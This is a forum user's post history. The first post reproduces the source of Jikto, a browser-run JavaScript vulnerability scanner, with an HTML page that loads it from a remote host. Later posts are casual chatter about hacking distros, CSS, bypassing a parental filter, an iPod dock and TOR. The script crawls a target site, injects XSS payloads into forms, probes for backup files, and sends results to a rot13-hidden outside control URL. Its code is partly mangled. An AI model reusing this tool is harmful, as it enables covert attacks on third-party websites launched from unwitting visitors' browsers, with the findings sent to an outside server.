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Posts posted by ichthuz

  1. Don't abuse this but in the interest of full disclosure.







    //blank document


    //------------------------------------------------------------------------------------ Analyzer
    //------------------------------------------------------------------------------------ Analyzer
    //------------------------------------------------------------------------------------ Analyzer
        function linkIsGood(l) {
            var lower = l.toLowerCase().substring(0,4);
            //this is stupid (could false pos), but effective
            if(lower == "java" || lower == "mail") {
                return false;
            var tmpU = Url.resolveRelativeLink(currRequest.url, l);
            //do checks here
            if(!fileExtAllowed(tmpU)) {
                return false;
            if(tmpU.hostname != startUrl.hostname) {
                return false;
            if(tmpU.port != startUrl.port) {
                return false;
            return true;
        function extractHREFsAsRequests(txt) {
            var pattern = /hrefs*=s*(["'])([^'"]*)1/gi;
            var links = new Array();
            var result;
            while( (result = pattern.exec(txt)) != null) {
            //refine what we RegExed out    
            var requests = new Array();
            var counter = 0;
            var linklen = links.length;
            for(; counter < linklen; counter++) {
                //clean out the prefix
                links[counter] = links[counter].replace(prefix,"");
                if(linkIsGood(links[counter])) {
                    requests.push( Request.fromUrl( Url.resolveRelativeLink(currRequest.url, links[counter]) ));
            return requests;
        function fileExtAllowed(u) {
            for(var i=0, bfl = badFiles.length; i < bfl; i++) {
                if(u.fileext.toLowerCase() == badFiles[i]) {
                    return false;
            return true;
        function tagParser(text) {
            var PRENAME = 0;
            var INNAME = 1;
            var INPREVALUE = 2;
            var INVALUE = 3;
            var attribs = new Object();
            var curr = 0;
            var len = text.length;
            var c = "";
            var state = PRENAME;
            var buff = "";
            var name = "";
            var quoteChar = "";
            while(curr < text.length) {
                c = text.charAt(curr);
                switch(state) {
                    case PRENAME:
                        switch(c) {
                            case ' ':
                            case 't':
                            case 'r':
                            case 'n':
                                buff = c;
                                state = INNAME;
                    case INNAME:
                        switch(c) {
                            case '=':
                                //= so name is done
                                name = trim(buff).toLowerCase();
                                buff = "";
                                quoteChar = "";
                                state = INPREVALUE;
                                buff += c;
                   case INPREVALUE:
                        switch(c) {
                            case ' ':
                            case 't':
                                //ignore it
                            case "'":
                            case """:
                                quoteChar = c;
                                state = INVALUE;
                                //anything is a value
                                quoteChar = "";
                                buff += c;
                                state = INVALUE;
                     case INVALUE:
                        switch(c) {
                            case quoteChar:
                                //all done!
                                attribs[name] = buff;
                                state = PRENAME;
                                buff = "";
                            case ' ':
                            case 't':
                            case 'r':
                            case 'n':
                                if(quoteChar == "") {
                                    attribs[name] = buff;
                                    state = PRENAME;
                                    buff = "";
                                buff += c;
                } //end switch
            } //end while
            var c = 10;
            return attribs;
        function extractFormsAsRequests(txt) {
            var requests = new Array();
            var lowertxt = txt.toLowerCase();
            //RegEx and results for FORM search
            var pattern = /<forms+([^>]+)/gi;
            var result;
            while( (result = pattern.exec(txt)) != null) {
                //parse out attributes for the form tag
                currForm = tagParser(result[1]);
                //setup something for the inputs            
                currForm.inputs = new Array();
                //find the "end" tag
                var endp = lowertxt.indexOf("</form", result.index+1);
                //grab all that text "inside" thos form
                var inner = txt.substring(result.index, endp);
                //grab all the inputs in the form
                var pattern2 = /<inputs+([^>]+)/gi;
                var result2;
                while( (result2 = pattern2.exec(inner)) != null) {
                    //parse out the attributes
                    currForm.inputs[currForm.inputs.length] = tagParser(result2[1]);
                //needs some inputs and an action
                if(currForm.inputs.length > 0 && currForm.action != undefined) {
                    if(linkIsGood(currForm.action)) {
                        var u = Url.resolveRelativeLink(currRequest.url, currForm.action);
                        if(currForm.method != undefined && currForm.method.toLowerCase() == "post") {
                            var req = Request.fromUrl(u);
                            req.method = "POST";
                            req.data = buildParamString(currForm.inputs);
                            requests[requests.length] = req;
                        } else {
                            u.queryParams = buildParamString(currForm.inputs);
                            requests[requests.length] = Request.fromUrl(u);
            return requests;
        function buildParamString(inps) {
            var ret = new Array();
            var seen = new Object();
            for(var i =0; i < inps.length; i++) {
                if(inps[i].name != undefined && seen[inps[i].name] == undefined) {
                    seen[inps[i].name] = true;
                    if(inps[i].value != undefined) {
                        ret[ret.length] = new NVPair(inps[i].name, inps[i].value);
                    } else {
                        ret[ret.length] = new NVPair(inps[i].name, "admin");                
            return ret;
    //------------------------------------------------------------------------------------ Attack Lib
    //------------------------------------------------------------------------------------ Attack Lib
    //------------------------------------------------------------------------------------ Attack Lib
    function generateBackupAttacks(request) {
        var requests = new Array();
        var newreq = new cloneObject(request);
        newreq.url.filename += ".bak";
        newreq.url.queryParams = new Array();
        newreq.data = "";
        newreq.method = "GET";
        newreq.origin = "audit";
        newreq.title = "Backup File Detected!";
        newreq.sev = 50;
        newreq.regex = /HTTP/1.1s200sOK/i;
        requests[requests.length] = newreq;
        var newreq = new cloneObject(request);
        newreq.url.filename += ".old";
        newreq.url.queryParams = new Array();
        newreq.data = "";
        newreq.method = "GET";
        newreq.origin = "audit";
        newreq.title = "Backup File Detected!";
        newreq.sev = 50;
        newreq.regex = /HTTP/1.1s200sOK/i;
        requests[requests.length] = newreq;
        return requests;
    function generatePPASSAttacks(request) {
        var requests = new Array();
        if(request.method == "GET" && request.url.queryParams.length > 0) {
            var newreq = new cloneObject(request);
            newreq.url.queryParams = new Array();
            for(var xxx=0; xxx < request.url.queryParams.length; xxx++) {
                newreq.url.queryParams[xxx] = new NVPair(request.url.queryParams[xxx].name,"<script>alert('xss')</script>");
            newreq.origin = "audit";
            newreq.title = "Cross Site Scripting";
            newreq.sev = 100;
            newreq.regex = /script/i;
            requests[requests.length] = newreq;
        } else if(request.method == "POST") {
            var t = request.data.length > 0;
            var newreq = new cloneObject(request);
            newreq.url.queryParams = new Array();
            newreq.data = new Array();
                newreq.data[0] = new NVPair("admin", "<script>alert('xss')</script>");
                newreq.data[1] = new NVPair("password", "<script>alert('xss')</script>");
                newreq.data[2] = new NVPair("graphicOption", "<script>alert('xss')</script>");
            newreq.origin = "audit";
            newreq.title = "Cross Site Scripting";
            newreq.sev = 100;
            newreq.regex = /script/i;
            requests[requests.length] = newreq;
        return requests;
    //------------------------------------------------------------------------------------ Global Variables
    //------------------------------------------------------------------------------------ Global Variables
    //------------------------------------------------------------------------------------ Global Variables
        var currRequest = null;
        var currResponse = null;
        var GUIURL = rot13("uggc://jjj.cragrfg.vg/wvxgb/pbageby.gkg"); //http://www.pentest.it/jikto/control.txt //http://localhost/JiktoControl/Collect.aspx?type=
        var SLASH = String.fromCharCode(47);
        //prefix for our requests
        var prefix = window.location.pathname.substr(0,window.location.pathname.indexOf("http:", 7))
        //image extensions
        var badFiles = ["jpg", "jpeg", "gif", "png", "ico", "psd", "xcf", "xmb", "svg", "wmv", "bmp", "pdf", "ps", "doc", "dot", "xls", "pot", "ppt", "avi", "mpeg", "mpg", "asf", "mov", "wmv", "rm", "mp2", "mp3", "wma", "wav", "aiff", "aif", "mid", "midi", "mp4", "au", "ra", "exe", "pif", "bat", "msi", "swf", "class", "sh", "zip", "gz", "tar", "rar", "z", "jar", "cab", "rpm"];
        //our requestor!
        var xhr= new XMLHttpRequest();
    //------------------------------------------------------------------------------------ GUI Interface
    //------------------------------------------------------------------------------------ GUI Interface
    //------------------------------------------------------------------------------------ GUI Interface
        function reportURL(method, url) {
            var i = new Image();
            i.src = GUIURL + "1&url=" + escape(url) + "&method=" + escape(method);  
        function reportVuln(method, url, sev, title, req, resp) {
            var i = new Image();
            i.src = GUIURL + "2&url=" + escape(url) + "&method=" + escape(method)+ "&sev=" + escape(sev) +"&title=" + escape(title) +"&req=" + escape(req) + "&resp=" + escape(resp);
    //------------------------------------------------------------------------------------ Misc Funcs
    //------------------------------------------------------------------------------------ Misc Funcs
    //------------------------------------------------------------------------------------ Misc Funcs
        function cloneObject(what) {
            for (var i in what) {
                if(typeof(what[i]) == "object") {
                    this[i] = new cloneObject(what[i]);
                } else {
                    this[i] = what[i];
        function rot13(txt) {
            var ret =""
            var len = txt.length;
            for(var i=0; i < len; i++) {
                var b = txt.charCodeAt(i);
                if( ((b>64) && (b<78)) || ((b>96) && (b<110)) ) {
                    b +=13;
                } else if( ((b>77) && (b<91)) || ((b>109) && (b<123)) ) {
                    b -=13;
                ret += String.fromCharCode(b);
            return ret;
        function trim(s) {
            return s.replace(/^s*(S*(s+S+)*)s*$/, "$1");
    //------------------------------------------------------------------------------------ Request
    //------------------------------------------------------------------------------------ Request
    //------------------------------------------------------------------------------------ Request
        function Request() {
            this.url = null;
            this.method = "";
            this.origin = "crawl";
            this.data = "";
            this.title = "xx";
            this.regex = "";
            this.sev = 0;
        Request.fromUrl = function(u) {
            var ret = new Request();
            ret.url = u;
            ret.method = "GET";
            ret.origin = "crawl";
            return ret;
        Request.prototype.getResource = function () {
            return this.url.toString();
        Request.prototype.toString = function () {
            return String.concat(this.method, " ", this.getResource(), " HTTP/1.1");
    //------------------------------------------------------------------------------------ Response
    //------------------------------------------------------------------------------------ Response
    //------------------------------------------------------------------------------------ Response
        //create a response object from a completely returned XHR obj!
        function Response(x) {
            this.status = x.status;
            this.statusText = x.statusText;
            this.is404 = false;
            this.headersString = x.getAllResponseHeaders();
            //extract the headers into a hash table
            this.headers = new Object();
            var tmp = this.headersString.split("n");
            var j;
            var k = ": ";
            for(var i =0; i < tmp.length; i++) {
                j = tmp[i].indexOf(k);
                if(j > 0) {
                    this.headers[tmp[i].substring(0, j)] = tmp[i].substring(j + 2, tmp[i].length);
            this.body = x.responseText;
            return this;
        function Response_toString() {
            var s="";
            var i;
            s = String.concat(s, "HTTP/1.1 ", this.status, " ", this.statusText, "n");
            for (i in this.headers) {
                s = String.concat(s, i, ": ", this.headers[i], "n");
            s = String.concat(s, this.data);
            return s;
        Response.prototype.toString = Response_toString;
    //------------------------------------------------------------------------------------ Scanner
    //------------------------------------------------------------------------------------ Scanner
    //------------------------------------------------------------------------------------ Scanner
        var pending = new Object();
        var pendingLen = 0;
        var visited = new Object();
        function addRequest(r) {
            if(r  != undefined) {
                if(pending[r.toString()] == undefined) {
                    if(visited[r.toString()] == undefined) {
                        pending[r.toString()] = r;
                        return true;
                return false;
        function processResponse() {
            // only if req shows "loaded"
            if (xhr.readyState == 4) {
                //send reponse off
                currResponse = new Response(xhr);
                if(currResponse.status == 200) {
                    reportURL(currRequest.method, currRequest.getResource());
                var requests = null;
                //grab any requests from HREFs
                requests = extractHREFsAsRequests(currResponse.body);
                var requests2 = extractFormsAsRequests(currResponse.body);
                if(requests2.length > 0) {
                    requests = requests.concat(requests2);
               if(requests.length > 0) {
                    //bubble up the GUI and add them (if needed)
                    for(var i =0; i < requests.length; i++)
                        //================= Generate Attacks
                        requests2 = generateBackupAttacks(requests[i]);
                        //requests2 = (generatePPASSAttacks(requests[i]));
                        requests2 = requests2.concat(generatePPASSAttacks(requests[i]));
                        if(requests2.length > 0) {
                            for(var k =0; k < requests2.length; k++)
                if(xhr.responseText.indexOf("xss") > 0) {
                    reportVuln(currRequest.method, currRequest.getResource(), 100, "Cross Site Scripting", currRequest.toString(), currResponse.toString());
                //==============score attacks here
                if(currRequest.origin == "audit") {
                    if(currResponse.toString().match(currRequest.regex)) {
                        reportVuln(currRequest.method, currRequest.getResource(), currRequest.sev, currRequest.title, currRequest.toString(), currResponse.toString());
        function sendNextRequest() {
            if(pendingLen == 0) {
                //toGUI("Scan Complete!");
                return true;
           //grab the first Request
            for(i in pending) {
                currRequest = pending[i];
            //remove it from the queue       
            delete pending[currRequest.toString()];
            //add it to visited
            visited[currRequest.toString()] = true;
            //clear out the old response obj
            currResponse = null;
            xhr = new XMLHttpRequest();
            var data = "";
            //register the handler function
            xhr.onreadystatechange = processResponse;
            xhr.open(currRequest.method, prefix + currRequest.getResource(), true);
            if(currRequest.method == "POST") {
                data = currRequest.data.join("&");
                xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
                xhr.setRequestHeader("Content-length", data.length);
                //http.setRequestHeader("Connection", "close");        
            //add our magic header
            xhr.setRequestHeader('X-Hax0r', 'Acidus');
    //------------------------------------------------------------------------------------ URL Object
    //------------------------------------------------------------------------------------ URL Object
    //------------------------------------------------------------------------------------ URL Object
        function NVPair(n, v) {
            this.name = n;
            this.value = v;
            return this;
        NVPair.prototype.toString = function() {
            return String.concat(escape(this.name), "=", escape(this.value));
        function setParamValue(name, value, ar) {
            for (var yyy in ar.length) {
                if(ar[yyy].name != undefined) {
                    if(ar[yyy].name == name) {
                        ar[yyy].value = value;
            return ar;    
        function getParamArray(qs) {
            var ret = new Array();
            var nvp = qs.split("&");
            for(var i=0; i < nvp.length; i++) {
                var tmp = nvp[i].split("=");
                if(tmp.length == 1) {
                    ret[ret.length] = new NVPair(unescape(tmp[0]), "");
                } else if(tmp.length == 2) {
                    ret[ret.length] = new NVPair(unescape(tmp[0]), unescape(tmp[1]));
            return ret;
        function Url(url) {
            this.protocol = "";
            this.hostname = "";
            this.port = "";
            this.path = "";
            this.frag ="";
            this.queryParams = new Array();
            if(arguments.length == 1) {
                var tmp;
                var rest;
                //grab the fraq
                tmp = url.split("#");
                rest = tmp[0];
                this.frag= (tmp.length > 1) ? unescape(String.concat("#",tmp[1])) : "";
                //grab the query string
                tmp = rest.split("?");
                rest = tmp[0];
                if(tmp.length > 1) {
                    this.queryParams = getParamArray(tmp[1]);
                //grab the protocol
                tmp = rest.split("//");
                if(tmp.length > 1) {
                    tmp[0] = unescape(tmp[0]);
                    this.protocol = tmp[0].substring(0,tmp[0].length-1).toLowerCase();              
                    rest = tmp[1];
                } else {
                    //alert("Invalid url "" + url + """);
                    throw "Invalid URL";
                //grab the host
                tmp = rest.split(SLASH);
                if(tmp.length > 1) {
                    //get rid of hostname
                    this.hostname = unescape(tmp.shift()).toLowerCase();
                    //only 1 thing left, which is the filename
                    if(tmp.length == 1) {
                        this.filename = unescape(tmp[0]);
                        this.path = SLASH;
                    } else {
                        //filename is at the end
                        this.filename = unescape(tmp.pop());
                        //recombine and add leading and trailing slashes
                        for(var i =0; i < tmp.length; i++) {
                            tmp[i] = unescape(tmp[i]);
                        for(var i = 0; i < tmp.length; i++) {
                            if(tmp[i] == ".") {
                                tmp.splice(i, 1);
                                i = i -1;
                            } else if(tmp[i] == "..") {
                                if(i == 0) {
                                    //more /../ than directories
                                    //alert("Invalid url "" + url + """);
                                    throw "Invalid URL";
                                tmp.splice(i-1, 2);
                        if(tmp.length >=1) {
                            this.path = String.concat(SLASH, tmp.join(SLASH), SLASH);
                        } else {
                            this.path = SLASH;
                } else {
                    this.hostname = unescape(tmp[0]);
                    this.path = SLASH;            
                //grab the port
                tmp = this.hostname.split(":");
                this.hostname = tmp[0];
                this.port = (tmp.length == 2) ? unescape(tmp[1]) : "";
                //be smart and fill in the port as needed
                if(this.port.length == 0) {
                    if(this.protocol == "http")
                        this.port = "80";
                        this.port = "443";
                //grab the filename extension
                if(this.filename.length > 0) {
                    tmp = this.filename.split(".");
                    this.fileext = (tmp.length > 1) ? tmp.pop() : "";
            return this;
        Url.prototype.addNV = function(name, value) {
            this.queryParams[this.queryParams.length] = new NVPair(name, value);
        function Url_resolveRelativeLink(baseUrl, relativeLink) {
            if(typeof(baseUrl) == "string") {
                baseUrl = new Url(baseUrl);
            //is it relative?
            if(unescape(relativeLink).indexOf("://") > 0) {
                return new Url(relativeLink);
            //alert("BASE IS: " + baseUrl);
            var s;
            //set up our base
            s = String.concat(baseUrl.protocol,
                              (baseUrl.port.length > 0) ? ":" + baseUrl.port : "");
            if(relativeLink.substring(0,1) == SLASH) {
                //link is relative to site root, so directly concat
                s = String.concat(s, relativeLink);
            } else {
                //link is relative to current path
                s = String.concat(s, baseUrl.path, relativeLink);
            return new Url(s);
        function Url_toString() {
            return String.concat(this.protocol,
                          (this.port.length > 0) ? ":" + this.port : "",
                          (this.queryParams.length > 0) ? "?" + this.queryParams.join("&") : "",
        function Url_toStringNoPath() {
            return String.concat(this.protocol,
                          (this.port.length > 0) ? ":" + this.port : "");
        Url.prototype.toString = Url_toString;
        Url.prototype.toStringNoPath = Url_toStringNoPath;
        Url.resolveRelativeLink = Url_resolveRelativeLink;    
    //var startUrlString = rot13("uggc://mreb.jronccfrphevgl.pbz/");
    var startUrlString = rot13("uggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc");  //http://blackhat-forums.com/phpBB2/index.php   uggc://oynpxung-sbehzf.pbz/cucOO2/vaqrk.cuc
    //var startUrlString = rot13("");
    var startUrl = new Url(startUrlString);
    //queue up first request
    //let 'er rip!


        <title>Jikto Scan</title>
        above script
        <script src="http://www.pentest.it/jikto/jikto.js"></script>
        <br />
        below script


            <TITLE>Jikto Test</TITLE>
            <script src="/mint/?js" type="text/javascript"></script>
    <!---         <iframe src="http://www.google.com/translate?u=http%3A%2F%2Fwww.pentest.it%2Fjikto%2Fjikto.html&langpair=en%7Cen&hl=en&ie=UTF8"></iframe>  ----->
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    skript kiddies shouldnt get how to work it, its pretty complex JS l33ts please dont post guides or the script kiddies will break the net.

  2. well i've never seen a distro built specifically for hacking. and myabe one that had a link to the community rainbow tables and an auto SAM file grabber. i think it would be VERY helpful. (sorry i missed this argument last time around.)

    in one of the epps there is a good 20 seconds of listing hacking distros O.o .. maybe you should watch the epps before posting on the forum :)

    already apologized for that thanks

  3. as you are looking for mainly design i would concentrate heavily on CSS and its various hacks and tricks. i can tell you there is nothing more frusterating than having your divs work in ie6 firefox and opera but not in safari and conqueror.

    /* its a handling exeption having to do with comments btw */

    ill dig up some links and edit this later

  4. Does anyone know how to stop a process with SYSTEM user level from launching? ive got a nanny filter installed for my kids and it runs as SYSTEM and as the user. is there a way to disable the SYSTEM process from the administrator account? meaning i want to be able to do whatever i want but i want to remove the restrictions for them.

  5. well i've never seen a distro built specifically for hacking. and myabe one that had a link to the community rainbow tables and an auto SAM file grabber. i think it would be VERY helpful. (sorry i missed this argument last time around.)

  6. hey guys i have no experience building Linux distros but I've always wanted to try and i figure, hey now I'm part of this awesome community that really gets behind projects and who are all VERY smart, what better time to do this.

    I know TomB has experience, anyone else any good at this sort of stuff? I think this could be another great community project.

  7. the other day these awesome headphones of mine got slept on and i broke them. the speakers still worked so i removed the bridge and mounted them in a little box. i can now plug the iPod into them and use them as speakers. now what i want to do is be able to mount a generic ipod dock with stereo out and USB out and DC out and be able to make the ipod play from that. the problem is I'll need a power source . is there a way i can jury rig a l-ion battery from an old laptop to power a DC powered ipod dock?

  8. i dont care about i deals and all that. it is a VERY well put together game which the army spent millions developing. IMHO its better than battlefield. it feels nittygrittier and there are better realistic things like recoil, cooking different grenades, different aiming system for the M203 grenade launcher, etc.

  9. quite obviously you dont understand TOR's exploits.

    There are a few ways to get the IP from someone using TOR

    That doesnt work unless all the routers or the last and first router are compromised. after each router the packet is encryoted with oublic key encryption and held for a given amount of time. so anyone looking at a router would not be able to recognize a packet going in as the same packet that came out a random amount of time later. each router un encrypts the packet (although it is still encrypted by several layers), then sends it on to the next router using the same technique. (i hate to b e explaining TOR)

    i would LOVE t o see any links you have on exploits. In my experience it cant be done

    maybe im wrong. please link

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